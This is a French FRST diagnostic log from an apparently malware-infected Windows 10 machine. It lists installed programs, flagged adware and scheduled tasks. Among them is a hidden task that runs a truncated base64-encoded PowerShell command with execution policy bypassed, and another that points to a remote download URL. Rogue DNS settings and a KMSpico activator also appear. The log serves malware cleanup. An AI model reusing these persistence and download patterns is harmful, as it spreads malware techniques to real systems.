Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 29-10-2016
Exécuté par UTILISATEUR (30-10-2016 13:24:57)
Exécuté depuis C:\Users\UTILISATEUR\Desktop
Windows 10 Pro Version 1511 (X64) (2016-01-26 16:44:38)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-2287989973-3124673205-43519314-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2287989973-3124673205-43519314-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2287989973-3124673205-43519314-1002 - Limited - Enabled)
Invité (S-1-5-21-2287989973-3124673205-43519314-501 - Limited - Disabled)
UTILISATEUR (S-1-5-21-2287989973-3124673205-43519314-1000 - Administrator - Enabled) => C:\Users\UTILISATEUR
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
Adobe Reader X (10.1.8) - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AA1000000001}) (Version: 10.1.8 - Adobe Systems Incorporated)
Caster (HKLM\...\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}) (Version: 1.0 - Caster) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.71 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
HDWallPaper 1.0 (HKLM-x32\...\HDWallPaper_is1) (Version: 1.0.0.76 - HDWallPaper) <==== ATTENTION
host version 1.1 (HKLM-x32\...\host_is1) (Version: 1.1 - Wizzlabs) <==== ATTENTION
Microsoft Office Professionnel Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{2af972c7-13b0-4978-92a8-fee26a4fb4e9}) (Version: 12.0.21005.1 - Корпорация Майкрософт)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation)
OtherSearch (HKLM-x32\...\OtherSearch) (Version: 3.0.3.4 - Ross Che) <==== ATTENTION
Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM-x32\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82C1-A2F9403F2DA6}) (Version: - Microsoft)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)
StreamOptimizer (HKU\S-1-5-21-2287989973-3124673205-43519314-1000\...\StreamOptimizer) (Version: - ) <==== ATTENTION
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.65452 - TeamViewer)
The Sims 4 (HKLM-x32\...\The Sims 4_R.G. Mechanics_is1) (Version: - R.G. Mechanics, ProZorg_tm)
The Sims 4 Update 1.0.797.20 (HKLM-x32\...\VGhlU2ltczQ=_is1) (Version: 1 - )
Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM-x32\...\{90150000-012B-040C-0000-0000000FF1CE}_Office15.PROPLUS_{8D97B9A2-D73D-4CB6-9D1F-D25178AC4EDE}) (Version: - Microsoft)
VAIO Care (HKLM-x32\...\{36C5BBF0-E5BF-4DE1-B684-7E90B0C93FB5}) (Version: 6.2.2.07150 - Sony Corporation)
VAIO Care (x32 Version: 6.2.2.07150 - Sony Corporation) Hidden
VAIO Control Center (HKLM-x32\...\{72042FA6-5609-489F-A8EA-3C2DD650F667}) (Version: 4.3.0.05310 - Sony Corporation)
VAIO Smart Network (HKLM-x32\...\{0899D75A-C2FC-42EA-A702-5B9A5F24EAD5}) (Version: 3.3.0.06080 - Sony Corporation)
VAIO Update (HKLM-x32\...\{9FF95DA2-7DA1-4228-93B7-DED7EC02B6B2}) (Version: 6.3.0.08010 - Sony Corporation)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VU5x64 (Version: 1.1.0 - Sony Corporation ) Hidden
VU5x86 (x32 Version: 1.0.0 - Sony Corporation ) Hidden
VU5x86 (x32 Version: 1.1.0 - Sony Corporation ) Hidden
ZHPFix 2015 (HKLM-x32\...\ZHPFix_is1) (Version: 2015 - Nicolas Coolman)
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
CustomCLSID: HKU\S-1-5-21-2287989973-3124673205-43519314-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\UTILISATEUR\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe => Pas de fichie (l'élément de données a 1 caractères en plus).
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {010279AC-0657-4AA4-8F38-E7C1645FB23A} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {02D3D0C2-3153-4B23-ADFF-481C7B052601} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {03E72698-02E7-4300-8BBC-6A68EC02D898} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)
Task: {0686C3B2-17BC-4F9E-B065-769B54D2F311} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {08F72429-B7A4-4ABA-94A4-6F158515AA75} - System32\Tasks\SONY\VAIO Power Management\VPM Logon Start => C:\Program Files\Sony\VAIO Power Management\SPMgr.exe [2010-06-21] (Sony Corporation)
Task: {09A97695-D5E5-4ADB-939F-A0CC5CEF08EB} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION
Task: {126C6886-AE2A-45C5-86FE-074024AABD21} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {1803D312-FBF2-4DDB-8AC5-FA9B07D4D5FD} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {1CBBAA39-7FC4-4EBD-9A4E-3998B2757FF6} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-03] (Google Inc.)
Task: {242A605A-FBB5-46C4-B8D1-77606088F201} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2C3EB428-2841-4C66-B25C-6BDA69F289A1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION
Task: {347586A3-C7C4-4CCB-B368-3CCFB29BD992} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION
Task: {3EDE5D92-0F59-43D9-8F29-D6B5181A6A74} - System32\Tasks\{7A0C0447-080E-0F7D-0E11-0C040E0F1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAA7ACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0A (l'élément de données a 9904 caractères en plus). <==== ATTENTION
Task: {48AA1071-3144-480E-A693-C3F30A7986E0} - System32\Tasks\VAIO Care => C:\Program Files\Sony\VAIO Care\VCsystray.exe [2010-07-15] (Sony Corporation)
Task: {4DC80ABE-FC93-4FEC-A1E5-03E4FDFF448A} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {51BC8B40-C5E4-42F1-B5E9-6DB3D92B0B9D} - System32\Tasks\PPI Update => "hxxp://insightcdn.online/download/index.php?mn=9995" <==== ATTENTION
Task: {67D092A2-D777-462A-B316-D4F878433D54} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6EBD342D-1318-416B-9261-F842C1AC0B3D} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {6F09CAF5-7370-4679-B6E3-7474EC35E8C1} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION
Task: {735E7D32-3023-4B5B-AE13-53FB10554791} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {7F28CF12-2EA0-4BBA-8432-EF1A2AC87643} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION
Task: {8023A701-82FB-4D13-9F98-5B50534F9CE0} - System32\Tasks\Anoduty Controls => C:\Program Files (x86)\Aromocult\wgerse.exe [2016-09-05] (Kunshan Aunbox software co.,Ltd)
Task: {8083EBBA-7CE7-4666-B5F1-04E6E4F228B0} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {841D4962-3426-43AB-9E9D-744AC251D214} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {8575D586-D63F-4411-94AB-5D89BFAAA031} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {864E81B4-EF47-4F52-B7A5-AFDE73405643} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {865AE22C-11FB-43A0-BEC3-7A444F0C66F7} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {8A719FBE-D148-4B5D-9B26-612846DF6367} - System32\Tasks\SONY\VAIO Power Management\VPM Session Change => C:\Program Files\Sony\VAIO Power Management\SPMgr.exe [2010-06-21] (Sony Corporation)
Task: {8CA0E780-C343-481A-9AE8-EF2A9F2D63C3} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update => C:\Program Files\Sony\VAIO Update\VAIOUpdt.exe [2013-08-01] (Sony Corporation)
Task: {964DE4F1-CD17-4666-84A4-F376E6AB5C06} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {992216CE-6670-4911-BD09-17535EFFDD70} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {9B6AB752-D045-498D-82E5-107B17C37543} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {AA6DD1E0-40C0-409E-BA35-64EB4E582A48} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {AD412A9E-A675-4EF7-9BE9-5DB5DD00E2C7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
Task: {AD9C75F4-4F0E-4041-9097-3CACFBC7FD76} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-03] (Google Inc.)
Task: {B0F9F860-3143-4B5A-A404-5CC97D1191E4} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update Self Ultimate Repair => C:\Program Files\Sony\VAIO Update\VUSR.exe [2013-08-01] (Sony Corporation)
Task: {B5BA8A02-5699-47E2-A26B-DE2AC3D8F71D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)
Task: {B6D89ABA-446A-4EFA-896A-684CDE368156} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {BCAC2235-6630-4B31-BF95-CBF39645A1BE} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C1167FD2-67B9-463E-B893-0B4BA8A1ACBC} - System32\Tasks\VAIO Care Support => C:\Program Files\Sony\VAIO Care\VCSpt.exe [2010-05-26] (Sony Corporation)
Task: {C3A61E2A-6C14-4548-A79F-508E59F16F19} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION
Task: {C5392E41-ACF9-409A-A646-B7D9E9ABC516} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DC1D709B-B5BB-4D12-B6C7-2FC12ECC073E} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {E47195BC-7511-4FA5-B561-37D9021BCE05} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {EB3C16D0-1F55-4A87-AA25-79C4FD573892} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-03] (Adobe Systems Incorporated)
Task: {EE5B9E00-723C-45ED-892A-D71BC630675A} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
Task: {EF508A0F-E91E-41B7-90C1-86316E5B048B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {F0E160E7-26E3-4268-A7F7-FF59B24EF4CC} - System32\Tasks\SONY\VAIO Power Management\VPM Unlock => C:\Program Files\Sony\VAIO Power Management\SPMgr.exe [2010-06-21] (Sony Corporation)
Task: {F2A5FF22-BCE8-45FB-A23F-208E034E2F11} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION
Task: {F4E11582-6A47-4E33-A7B7-462A4B49C2D8} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe <==== ATTENTION
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Raccourcis =============================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
ShortcutWithArgument: C:\Users\UTILISATEUR\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\UTILISATEUR\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
==================== Modules chargés (Avec liste blanche) ==============
2016-10-13 12:59 - 2016-10-28 11:14 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Program Files (x86)\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Program Files (x86)_\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.3\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.3_\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.4\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.4_\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.5\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.5_\local64spl.dll
2016-10-13 12:59 - 2016-10-13 12:59 - 00470592 _____ () C:\WINDOWS\SysWOW64\NetUtils2016.exe
2016-05-05 11:16 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-05-05 11:16 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-05-05 12:08 - 2016-05-05 12:09 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-01-27 22:51 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-05-12 12:21 - 2016-04-23 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-05-12 12:22 - 2016-04-23 05:02 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-05-12 12:22 - 2016-04-23 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-05-12 12:22 - 2016-04-23 04:58 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-05-12 12:23 - 2016-04-23 05:01 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2012-11-26 22:54 - 2012-11-26 22:54 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-09-05 21:50 - 2016-09-05 21:50 - 00544256 _____ () c:\program files (x86)\aromocult\chcndf.dll
2012-08-24 16:04 - 2010-05-31 18:18 - 00013824 _____ () C:\Program Files (x86)\Sony\VAIO Event Service\VESBasePS.dll
2012-08-24 16:04 - 2010-05-31 18:18 - 00013312 _____ () C:\Program Files (x86)\Sony\VAIO Event Service\VESMgrSubPS.dll
2016-05-05 12:08 - 2016-05-05 12:09 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-05-05 12:08 - 2016-05-05 12:09 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-09-05 21:50 - 2016-09-05 21:50 - 00233984 _____ () C:\Users\UTILISATEUR\AppData\Local\iklado.dll
2016-08-11 14:04 - 2016-08-11 14:04 - 00258560 _____ () C:\Users\UTILISATEUR\AppData\Roaming\Geunfy\Yurejjaeb.dll
2016-08-11 14:49 - 2016-08-11 14:49 - 00258560 _____ () C:\Users\UTILISATEUR\AppData\Roaming\Nuidereg\Gojko.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zdwfp => ""="Driver"
==================== Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
==================== Hosts contenu: ==========================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2009-07-14 03:34 - 2016-10-26 12:39 - 00001640 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 union.baidu2019.com
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-2287989973-3124673205-43519314-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\UTILISATEUR\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{d2f21b8e-97da-438a-a0e6-fb38c2b1a66f}.jpg
DNS Servers: 104.197.191.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{4512F0D1-8D57-45B1-B155-3F1692AA6680}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{46CCEA0F-35CF-47F7-B979-78175F7DDAC2}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{1DA12D6A-DF96-4377-B72E-B8DE81415043}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{D3F6ADA5-C99B-4EDD-A413-E5CC2C39C3DA}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{0F441E4C-A9D2-4B31-850F-84D0A5AFF1C4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{88EFBDC3-1A50-471B-93F8-B9BF504B673B}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{16A57E88-BDA0-45F2-9DD6-A1358D92B449}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{91D7D610-C40C-4A0C-B32E-E884A8B21316}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6BDA8F8D-3A78-4FBC-9259-748C75D13890}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{1B73BF64-5408-4417-8C3B-8FA0EE69F23D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{DBB0BB13-3F3C-4C85-8181-DB26D76EAC36}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{2B4D922E-0BA3-4F81-9B63-41030B08559B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{D8A7045E-0C98-453F-BDAC-51A50236CB08}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{E7B48DB4-B684-4D9E-8CED-5A08CF4ADAB0}] => (Allow) LPort=1688
FirewallRules: [{72F7E7E5-FD5F-4C4E-A35A-CBB5ED32D63E}] => (Allow) LPort=1688
FirewallRules: [{0A1C93E6-0DBB-4108-81E9-839B189EA9A8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Points de restauration =========================
05-09-2016 19:34:54 Windows Update
18-10-2016 20:39:41 Point de contrôle planifié
26-10-2016 13:43:21 Point de contrôle planifié
==================== Éléments en erreur du Gestionnaire de périphériques =============
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (10/30/2016 01:13:42 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: VAIO-VPC)
Description: Échec de l’activation de l’application Microsoft.Windows.Photos_8wekyb3d8bbwe!App avec l’erreur : -2144927142 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/30/2016 01:13:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme Microsoft.Photos.exe version 1.0.1607.22006 a cessé d'interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l'historique du problème dans le panneau de configuration Sécurité et maintenance.
ID de processus : 1eb0
Heure de début : 01d232a6c75174ac
Heure de fin : 4294967295
Chemin d'accès de l'application : C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
ID de rapport : 4ac09cf6-9e9a-11e6-8d88-f0bf970e8634
Nom complet du package défaillant : Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe
ID de l'application relative au package défaillant : App
Error: (10/30/2016 01:11:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: VAIO-VPC)
Description: Échec de l’activation de l’application Microsoft.Windows.Photos_8wekyb3d8bbwe!App avec l’erreur : -2144927141 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/26/2016 01:43:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary zdwfp.
System Error:
Le fichier spécifié est introuvable.
.
Error: (10/26/2016 01:43:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocole LLDP (Link Layer Discovery Protocol) Microsoft.
System Error:
Accès refusé.
.
Error: (10/26/2016 01:43:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary cherimoya.
System Error:
Le fichier spécifié est introuvable.
.
Error: (10/26/2016 12:16:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante Service_KMS.exe, version : 13.2.0.0, horodatage : 0x53a73868
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0x00000000
Décalage d’erreur : 0x00007ff8442b0668
ID du processus défaillant : 0x9b0
Heure de début de l’application défaillante : 0x01d22f79d286bcb0
Chemin d’accès de l’application défaillante : C:\Program Files\KMSpico\Service_KMS.exe
